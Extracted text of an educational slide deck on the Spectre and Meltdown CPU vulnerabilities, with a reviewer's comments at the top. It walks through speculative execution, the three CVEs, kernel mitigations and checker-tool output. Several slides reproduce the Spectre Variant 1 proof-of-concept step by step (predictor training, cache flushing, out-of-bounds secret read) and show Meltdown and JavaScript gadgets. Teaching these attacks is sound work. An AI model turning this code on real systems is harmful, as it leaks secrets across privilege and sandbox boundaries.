Don't mention TLB (at all?!?), just confuses people. Was just put so people
were aware that it was being set up for deterministic behaviour (the side
channel is the cache exclusively, not the TLB missing).
Don't mention the privilege level arch stuff until *after* Variant 1 has been
discussed, rather prior to Variant 2, and especially 3/Meltdown.
To explain the victim vs. attacker domains better in Variant 1, the example of
two threads in a process should be given, where one thread is the
'parent'/'governor' of the other(s), and has privileged information, e.g., a
valid TLS session key for a bank account login in another thread/tab in a
browser. One thread should not be able to 'see' another's private data.
Items such as the AntiVirus report could easily be omitted...
Thanks,
Kim Phillips
5. OOOE – general schemeOOOE – general scheme
●
Fetch & decode instructions in parallel but in order, to fill inst. pool
●
Execute ready instructions from the instructions pool
– All the data required for the instruction is ready
– Execution resources are available
●
Once an instruction is executed
– Signal all dependent instructions that data is ready
●
Commit instructions in parallel but in-order
– Can commit an instruction only after all preceding instructions (in
program order) have committed
Fetch &
Decode
Instruction
pool
Retire
(commit)
In-order In-order
Execute
Out-of-order
6. Branch prediction
Implementation
– Use local history to predict direction
– Need to predict multiple branches
Need to predict branches before previous branches are resolved
Branch history updated first based on prediction, later based on
actual execution (speculative history)
– Target address taken from BTB
Prediction rate: ~92%
– High prediction rate is crucial for long pipelines
– Especially important for OOOE, speculative execution:
On misprediction all instructions following the branch in the instruction
window are flushed
Effective size of the window is determined by prediction accuracy
7. Speculative execution –Speculative execution –
exampleexample
cycle 1 cycle 2
(1) r1 mem1 r1’ mem1
(2) r2 r2 + r1 r2’ r2 + r1’
(3) r1 mem2 r1” mem2
(4) r3 r3 + r1 r3’ r3 + r1”
(5) jmp cond L2 predicted taken to L2
(6)L2 r1 mem3 r1”’ mem3
(7) r4 r5 + r1 r4’ r5 + r1”’
(8) r5 2 r5’ 2
(9) r6 r5 + 2 r6’ r5’ + 2
Instructions 6-9 are speculatively executed
If the prediction turns wrong, they will be flushed
If the branch was predicted not-taken
The instructions from the other path would have been speculatively
executed
WAW
WAW
WAR
Speculative
Execution
8. CS 3214 Fall 2010
Dual-Mode Operation
• Two fundamental modes:
– “kernel mode” – privileged
• aka system, supervisor or monitor mode
• Intel calls its PL0, Privilege Level 0 on x86
– “user mode” – non-privileged
• PL3 on x86
• Bit in CPU – controls operation of CPU
– Privileged operations can only
be performed in kernel mode.
Example: hlt
– Must carefully control transition
between user & kernel mode
int main()
{
asm(“hlt”);
}
int main()
{
asm(“hlt”);
}
12. CS 3214 Fall 2010
Dual-Mode Operation
• Two fundamental modes:
– “kernel mode” – privileged
• aka system, supervisor or monitor mode
• Intel calls its PL0, Privilege Level 0 on x86
– “user mode” – non-privileged
• PL3 on x86
• Bit in CPU – controls operation of CPU
– Privileged operations can only
be performed in kernel mode.
Example: hlt
– Must carefully control transition
between user & kernel mode
int main()
{
asm(“hlt”);
}
int main()
{
asm(“hlt”);
}
What will happen
if a root/admin
user runs this?
15. Memory Management Unit (MMU)
Privilege bit
fault/exception
user
user
user
Kernel only
Kernel only
16. L1 / L2 / L3 data cache memory
●
Caches are virtually indexed, physically tagged
so they can be accessed in parallel to the MMU
lookup
17.
18.
19. Three Common Vulnerabilities and
Exposures (CVE)
– Spectre Variant 1
●
CVE-2017-5753
●
“Bounds Check Bypass”
●
“Systems with microprocessors utilizing speculative execution and branch prediction may allow
unauthorized disclosure of information to an attacker with local user access via a side-channel
analysis.”
●
Primarily affects interpreters/JITs
– Spectre Variant 2
●
CVE-2017-5715
●
“Branch Target Injection”
●
...indirect branch prediction…
●
Primarily affects kernels/hypervisors
– 'Meltdown' aka 'Variant 3'
●
CVE-2017-5754
●
“Rogue Data Cache Load”
●
Affects kernels (and architecturally equivalent software)
20. Variant 1 example (from paper): victim function
unsigned int array1_size = 16;
uint8_t array1[160] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
uint8_t array2[256 * 512];
uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
void victim_function(size_t x)
{
if (x < array1_size)
{
temp &= array2[array1[x] * 512];
}
}
21. Step 1: declare victim array memory, fn
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
uint8_t unused2[64];
uint8_t array2[256 * 512];
char* secret = "The Magic Words are Squeamish Ossifrage.";
size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
void victim_function(size_t x)
{
if (x < array1_size)
{
temp &= array2[array1[x] * 512];
}
}
on own cache line so it is only thing evicted
One (Intel) cache line
One (Intel) cache line
Safe values within bounds
Used at BP training time
22. Step 2: write all of array2 to warm page table cache (TLB)
Step 3: Initialize results array to reduce noise when reading
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
uint8_t unused2[64];
uint8_t array2[256 * 512];
char* secret = "The Magic Words are Squeamish Ossifrage.";
size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
for (size_t i = 0; i < sizeof(array2); i++)
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
for (i = 0; i < 256; i++)
results[i] = 0;
23. Step 4: flush array2 from cache (not TLB)
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
uint8_t unused2[64];
uint8_t array2[256 * 512];
char* secret = "The Magic Words are Squeamish Ossifrage.";
size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
for (tries = 999; tries > 0; tries--)
{
/* Flush array2[512*(0..255)] from cache */
_mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
match victim fn stride
24. Step 5: 30 x [5 BP-training runs and
1 out of bounds attack]
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
training_x = tries % array1_size; /* always meets < array1_size condition */
for (j = 29; j >= 0; j--)
{
_mm_clflush(&array1_size); /* cause victim fn's boundary check to stall */
/* wait for flush to memory to complete */
for (volatile int z = 0; z < 100; z++)
{
} /* Delay (can also mfence) */
/* Bit twiddling to set x=training_x if j%6 != 0 or malicious_x if j%6 == 0 */
/* Avoid jumps in case those tip off the branch predictor */
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=ffffffffffff0000 if j%6 == 0, else x=0 */
x = (x | (x >> 16)); /* Set x=ffffffffffffffff if j%6 == 0, else x=0 */
/* Set x=training_x if j%6 != 0, else x=malicious_x */
x = training_x ^ (x & (malicious_x ^ training_x));
/* Call the victim! */
victim_function(x);
}
void victim_function(size_t x)
{
if (x < array1_size)
{
temp &= array2[array1[x] * 512];
}
} flushed secret
flushes
Transient instructions executed 1 in 6 times
29. Violating Javascript’s Sandbox
a matter of convincing the JIT to generate the asm we want
if (index < simpleByteArray.length) {
index = simpleByteArray[index | 0];
index = (((index * TABLE1_STRIDE) | 0) & (TABLE1_BYTES–1))|0;
localJunk ^= probeTable[index | 0] | 0;
}
https://rwc.iacr.org/2018/Slides/Horn.pdf
Check if your browser is vulnerable:
http://xlab.tencent.com/special/spectre/spectre_check.html
30. Linux kernel’s Variant 1 mitigation attempt: add helper fn
to sanitize an array index after a bounds check
/* When @index is out of bounds (@index >= @size), the sign bit will be
* set. Extend the sign bit to all bits and invert, giving a result of
* zero for an out of bounds index, or ~0 if within bounds [0, @size).
*/
static inline unsigned long array_index_mask_nospec(unsigned long index,
unsigned long size)
{
OPTIMIZER_HIDE_VAR(index);
return ~(long)(index | (size - 1UL - index)) >> (BITS_PER_LONG - 1);
}
/* For a code sequence like:
* if (index < size) {
* index = array_index_nospec(index, size);
* val = array[index];
* }
* ...if the CPU speculates past the bounds check then
* array_index_nospec() will clamp the index within the range of [0,
* size).
*/
#define array_index_nospec(index, size)
({
typeof(index) _i = (index);
typeof(size) _s = (size);
unsigned long _mask = array_index_mask_nospec(_i, _s);
_i &= _mask;
_i;
})
Have to scan all current and future
kernel source, and replace any
speculation vulnerable code to use
this helper fn instead.
That’s what the Linux kernel is
doing for its own code.
What does this mean for all other
code being developed around the
world?
Will compilers, exec. loaders,
interpreters, JITs help Apps
developers not write bounds
checking code incorrectly?
Variant 1 is here to haunt us for a
while...but wait, there are more!
31. Variant 2: branch target injection
●
Like Variant 1, but instead of conditional branch speculative execution, it applies
to indirect branch speculative execution
– Used with C pointers to functions, C++ virtual functions, system call jump tables, etc.
●
Example: A common C++ indirect branch
class Base {
public:
virtual void Foo() = 0;
};
class Derived : public Base {
public:
void Foo() override { … }
};
Base* obj = new Derived;
obj->Foo();
jmp *%rax; /* indirect branch to the target referenced by %rax */
32. Variant 2: branch target injection
●
Unlike variant 1, the side channel is the branch predictor (not the data
cache)
– Unlike caches, branch predictors don’t uniquely tag addresses
– BTBs don’t discriminate kernel/user domains
– Haswell BTB: partial virt. addr + recent history fingerprint
●
Prior research: Break Address Space Layout Randomization (ASLR)
across security domains
– As a victim, able to determine where the kernel / hypervisor code is
●
Inject misspeculation to controlled addresses across security domains
– transient instruction execution in kernel / hypervisor mode
– st 0(r1) ← #hlt_insn_opcode […] jmp r1
33. Variant 2 “mitigations”
●
Lots of CPUs don’t have means of BTB invalidation (bpiall insn)
– Take 1,000s of branches for each indirect branch?
– Reset the MMU by turning if off and on again?
– (mostly x86) does a microcode update really fix all cases?
●
‘retpoline’: Example of an indirect jump with manual prediction
cmp %r11, known_indirect_target
jne retpoline_r11_trampoline
jmp known_indirect_target
●
llvm/clang 7.0.0, gcc 7.3.0 support
●
demo script showing current^Wdu jour kernel mitigation status
– later in this presentation
https://support.google.com/faqs/answer/7625886
34. Variant 3 / Meltdown
●
Like Variant 1, but malicious_x targets kernel memory
i = *pointer; // into kernel mapped memory
y = i * 256;
z = array2[y];
●
Tries to access privileged (kernel) memory
– race condition in privilege check of processor
– Dependent instructions can execute before execution is aborted!
●
Malicious code an install own signal handler to continue
running after page fault:
– signal(SIGSEGV /* 11 */, segv_handler_fn);
35. Meltdown Mitigation (cross-arch)
KPTI: Kernel Page Table Isolation
previously Kernel Address Isolation to have Side-channels Efficiently Removed (KAISER)
Privilege bit
fault/exception
user
user
user
Kernel only
Kernel only
KPTI UNMAPS PRIOR TO CONTEXT
SWITCHING INTO USERSPACE
Kernel update required
36. Vulnerable Intel h/w products
●
Intel® Core™ i3 processor (45nm and 32nm)
●
Intel® Core™ i5 processor (45nm and 32nm)
●
Intel® Core™ i7 processor (45nm and 32nm)
●
Intel® Core™ M processor family (45nm and
32nm)
●
2nd generation Intel® Core™ processors
●
3rd generation Intel® Core™ processors
●
4th generation Intel® Core™ processors
●
5th generation Intel® Core™ processors
●
6th generation Intel® Core™ processors
●
7th generation Intel® Core™ processors
●
8th generation Intel® Core™ processors
●
Intel® Core™ X-series Processor Family for
Intel® X99 platforms
●
Intel® Core™ X-series Processor Family for
Intel® X299 platforms
●
Intel® Xeon® processor 3400 series
●
Intel® Xeon® processor 3600 series
●
Intel® Xeon® processor 5500 series
●
Intel® Xeon® processor 5600 series
●
Intel® Xeon® processor 6500 series
●
Intel® Xeon® processor 7500 series
●
Intel® Xeon® Processor E3 Family
●
Intel® Xeon® Processor E3 v2 Family
●
Intel® Xeon® Processor E3 v3 Family
●
Intel® Xeon® Processor E3 v4 Family
●
Intel® Xeon® Processor E3 v5 Family
●
Intel® Xeon® Processor E3 v6 Family
●
Intel® Xeon® Processor E5 Family
●
Intel® Xeon® Processor E5 v2 Family
●
Intel® Xeon® Processor E5 v3 Family
●
Intel® Xeon® Processor E5 v4 Family
●
Intel® Xeon® Processor E5 Family
●
Intel® Xeon® Processor E5 v2 Family
●
Intel® Xeon® Processor E5 v3 Family
●
Intel® Xeon® Processor E5 v4 Family
●
Intel® Xeon® Processor E7 Family
●
Intel® Xeon® Processor E7 v2 Family
●
Intel® Xeon® Processor E7 v3 Family
●
Intel® Xeon® Processor E7 v4 Family
●
Intel® Xeon® Processor Scalable Family
●
Intel® Xeon Phi™ Processor 3200, 5200,
7200 Series
●
Intel® Atom™ Processor C Series
●
Intel® Atom™ Processor E Series
●
Intel® Atom™ Processor A Series
●
Intel® Atom™ Processor x3 Series
●
Intel® Atom™ Processor Z Series
●
Intel® Celeron® Processor J Series
●
Intel® Celeron® Processor N Series
●
Intel® Pentium® Processor J Series
●
Intel® Pentium® Processor N Series
https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr
37. Vulnerable Arm h/w products
https://developer.arm.com/support/security-update
Refer to Arm partner websites, e.g., Qualcomm, Apple, NXP etc.,
for status of their particular implementations
38. x86box$ sudo ./spectre-meltdown-checker.sh (page 1: h/w)
https://github.com/speed47/spectre-meltdown-checker
Spectre and Meltdown mitigation detection tool v0.32
Checking for vulnerabilities on current system
Kernel is Linux 4.13.0-31-generic #34-Ubuntu SMP Fri Jan 19 16:34:46 UTC 2018 x86_64
CPU is Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
Hardware check
* Hardware support (CPU microcode) for mitigation techniques
* Indirect Branch Restricted Speculation (IBRS)
* SPEC_CTRL MSR is available: NO
* CPU indicates IBRS capability: NO
* Indirect Branch Prediction Barrier (IBPB)
* PRED_CMD MSR is available: NO
* CPU indicates IBPB capability: NO
* Single Thread Indirect Branch Predictors (STIBP)
* SPEC_CTRL MSR is available: NO
* CPU indicates STIBP capability: NO
* Enhanced IBRS (IBRS_ALL)
* CPU indicates ARCH_CAPABILITIES MSR availability: NO
* ARCH_CAPABILITIES MSR advertises IBRS_ALL capability: NO
* CPU explicitly indicates not being vulnerable to Meltdown (RDCL_NO): NO
* CPU vulnerability to the three speculative execution attacks variants
* Vulnerable to Variant 1: YES
* Vulnerable to Variant 2: YES
* Vulnerable to Variant 3: YES
39. Intel issuing microcode fixes via
BIOS update
https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/microcode-update-guidance.pdf
40. x86box$ sudo ./spectre-meltdown-checker.sh (page 2: s/w)
CVE-2017-5753 [bounds check bypass] aka 'Spectre Variant 1'
* Checking count of LFENCE opcodes in kernel: YES
> STATUS: NOT VULNERABLE (114 opcodes found, which is >= 70, heuristic to be improved when official
patches become available)
CVE-2017-5715 [branch target injection] aka 'Spectre Variant 2'
* Mitigation 1
* Kernel is compiled with IBRS/IBPB support: YES
* Currently enabled features
* IBRS enabled for Kernel space: NO (echo 1 > /proc/sys/kernel/ibrs_enabled)
* IBRS enabled for User space: NO (echo 2 > /proc/sys/kernel/ibrs_enabled)
* IBPB enabled: NO (echo 1 > /proc/sys/kernel/ibpb_enabled)
* Mitigation 2
* Kernel compiled with retpoline option: NO
* Kernel compiled with a retpoline-aware compiler: NO
* Retpoline enabled: NO
> STATUS: VULNERABLE (IBRS hardware + kernel support OR kernel with retpoline are needed to mitigate the
vulnerability)
CVE-2017-5754 [rogue data cache load] aka 'Meltdown' aka 'Variant 3'
* Kernel supports Page Table Isolation (PTI): YES
* PTI enabled and active: YES
* Running under Xen PV (64 bits): NO
> STATUS: NOT VULNERABLE (PTI mitigates the vulnerability)
A false sense of security is worse than no security at all, see --disclaimer
41. arm64box$ sudo ./spectre-meltdown-checker.sh (old version)
Spectre and Meltdown mitigation detection tool v0.31
Checking for vulnerabilities against running kernel Linux 4.15.0-rc8+ #21 SMP Tue Jan 16 20:43:10 CST 2018 aarch64
CPU is ARM v8 model 0xd07
CVE-2017-5753 [bounds check bypass] aka 'Spectre Variant 1'
* Checking count of LFENCE opcodes in kernel: UNKNOWN
> STATUS: UNKNOWN (couldn't check (couldn't extract your kernel from /boot//Image-4.15.0-rc8+))
CVE-2017-5715 [branch target injection] aka 'Spectre Variant 2'
* Mitigation 1
* Hardware (CPU microcode) support for mitigation
* The SPEC_CTRL MSR is available: UNKNOWN (couldn't read /dev/cpu/0/msr, is msr support enabled in your kernel?)
* The SPEC_CTRL CPUID feature bit is set: UNKNOWN (couldn't read /dev/cpu/0/cpuidr, is cpuid support enabled in your
kernel?)
* Kernel support for IBRS: NO
* IBRS enabled for Kernel space: NO
* IBRS enabled for User space: NO
* Mitigation 2
* Kernel compiled with retpoline option: NO
* Kernel compiled with a retpoline-aware compiler: NO
> STATUS: VULNERABLE (IBRS hardware + kernel support OR kernel with retpoline are needed to mitigate the vulnerability)
CVE-2017-5754 [rogue data cache load] aka 'Meltdown' aka 'Variant 3'
* Kernel supports Page Table Isolation (PTI): NO
* PTI enabled and active: NO
* Checking if we're running under Xen PV (64 bits): NO
> STATUS: NOT VULNERABLE (your CPU vendor reported your CPU model as not vulnerable)
A false sense of security is worse than no security at all, see --disclaimer
42. arm64box$ sudo ./spectre-meltdown-checker.sh (page 1: h/w)
Spectre and Meltdown mitigation detection tool v0.32
Checking for vulnerabilities on current system
Kernel is Linux 4.15.0-rc8+ #21 SMP Tue Jan 16 20:43:10 CST 2018 aarch64
CPU is ARM v8 model 0xd07
Hardware check
* Hardware support (CPU microcode) for mitigation techniques
* Indirect Branch Restricted Speculation (IBRS)
* SPEC_CTRL MSR is available: UNKNOWN (couldn't read /dev/cpu/0/msr, is msr support enabled in your kernel?)
* CPU indicates IBRS capability: UNKNOWN (couldn't read /dev/cpu/0/cpuid, is cpuid support enabled in your kernel?)
* Indirect Branch Prediction Barrier (IBPB)
* PRED_CMD MSR is available: UNKNOWN (couldn't read /dev/cpu/0/msr, is msr support enabled in your kernel?)
* CPU indicates IBPB capability: UNKNOWN (couldn't read /dev/cpu/0/cpuid, is cpuid support enabled in your kernel?)
* Single Thread Indirect Branch Predictors (STIBP)
* SPEC_CTRL MSR is available: UNKNOWN (couldn't read /dev/cpu/0/msr, is msr support enabled in your kernel?)
* CPU indicates STIBP capability: UNKNOWN (couldn't read /dev/cpu/0/cpuid, is cpuid support enabled in your
kernel?)
* Enhanced IBRS (IBRS_ALL)
* CPU indicates ARCH_CAPABILITIES MSR availability: UNKNOWN (couldn't read /dev/cpu/0/cpuid, is cpuid support
enabled in your kernel?)
* ARCH_CAPABILITIES MSR advertises IBRS_ALL capability: NO
* CPU explicitly indicates not being vulnerable to Meltdown (RDCL_NO): NO
* CPU vulnerability to the three speculative execution attacks variants
* Vulnerable to Variant 1: YES
* Vulnerable to Variant 2: YES
* Vulnerable to Variant 3: YES
43. arm64box$ sudo ./spectre-meltdown-checker.sh (page 2: s/w)
CVE-2017-5753 [bounds check bypass] aka 'Spectre Variant 1'
* Checking count of LFENCE opcodes in kernel: UNKNOWN
> STATUS: UNKNOWN (couldn't check (couldn't extract your kernel from /boot//Image-4.15.0-rc8+))
CVE-2017-5715 [branch target injection] aka 'Spectre Variant 2'
* Mitigation 1
* Kernel is compiled with IBRS/IBPB support: NO
* Currently enabled features
* IBRS enabled for Kernel space: NO
* IBRS enabled for User space: NO
* IBPB enabled: NO
* Mitigation 2
* Kernel compiled with retpoline option: NO
* Kernel compiled with a retpoline-aware compiler: NO
* Retpoline enabled: NO
> STATUS: VULNERABLE (IBRS hardware + kernel support OR kernel with retpoline are needed to mitigate
the vulnerability)
CVE-2017-5754 [rogue data cache load] aka 'Meltdown' aka 'Variant 3'
* Kernel supports Page Table Isolation (PTI): NO
* PTI enabled and active: NO
* Running under Xen PV (64 bits): NO
> STATUS: VULNERABLE (PTI is needed to mitigate the vulnerability)
A false sense of security is worse than no security at all, see --disclaimer
45. Performance: -ve, but since you’re
updating anyway...
Greg Kroah-Hartman
Public
Jan 31, 2018
From an email thread forwarded to me about one Linux user benchmarking recent kernel versions on a specific
network-heavy load:
"4.15 is 7-9% faster than 4.11"
"Turning kpti on makes 4.15 1-2% slower than 4.11"
So, overall, we are right back where we started from. Which makes me feel good, the recent Meltdown changes turn
out to not really be much of a problem overall.
Although those developers who worked so hard to get that 7-9% increase over the past year might not be all happy,
this should help put to rest the gloom-and-doom reports that various articles are reporting lately.
But if you are stuck at an old kernel version (i.e. 3.10.y, 4.4.y, or 4.9.y or whatever your distro is camping on for the
next decade), that's a totally different story. Go forth and benchmark! Then go update to a newer kernel version, odds
are it will be a good improvement.
https://plus.google.com/+gregkroahhartman/posts/BaTW7AXDRjW
46. AV-Test discovered 119 new samples associated
with these vulnerabilities
https://blog.fortinet.com/2018/01/30/the-exponential-growth-of-detected-malware-targeted-at-meltdown-and-spectre
47. AV-Test discovered 119 new samples associated
with these vulnerabilities
83% based on PoC code, other 17% under NDA
48. Conclusion
●
Significant attack
●
Hard to mitigate, “it will haunt us for a long time.”
●
Variant 3 (Meltdown) can read kernel memory but is mitigated
with KPTI (update kernel!)
●
Variants 1, 2 not mitigated, almost every processor made since
1995 is vulnerable
●
Users: Don’t stop* updating all software (OS, browsers, apps),
firmware/microcode, and ultimately, hardware
●
Developers: update compilers, tools, employ scanners, start to
monitor and integrate variant 1, 2 mitigations into your project(s)
* Why, are there more?
49. What allocation algorithm is Mitre using for CVE
numbers?
$ zgrep -E ^Name:|** allitems.txt.gz | grep -C 5 2017-5715
Name: CVE-2017-5712
Name: CVE-2017-5713
** RESERVED **
Name: CVE-2017-5714
** RESERVED **
Name: CVE-2017-5715
Name: CVE-2017-5716
** REJECT **
Name: CVE-2017-5717
Name: CVE-2017-5718
** RESERVED **
Variant 2, branch target injection
“This candidate is a reservation duplicate of CVE-2017-
12865” (Stack-based buffer overflow in "dnsproxy.c"...)
Type Confusion in Content Protection HECI Service in Intel Graphics
Driver allows unprivileged user to elevate privileges via local access
Buffer overflow in Active Management Technology (AMT) in
Intel Manageability Engine Firmware
https://cve.mitre.org/data/downloads/index.html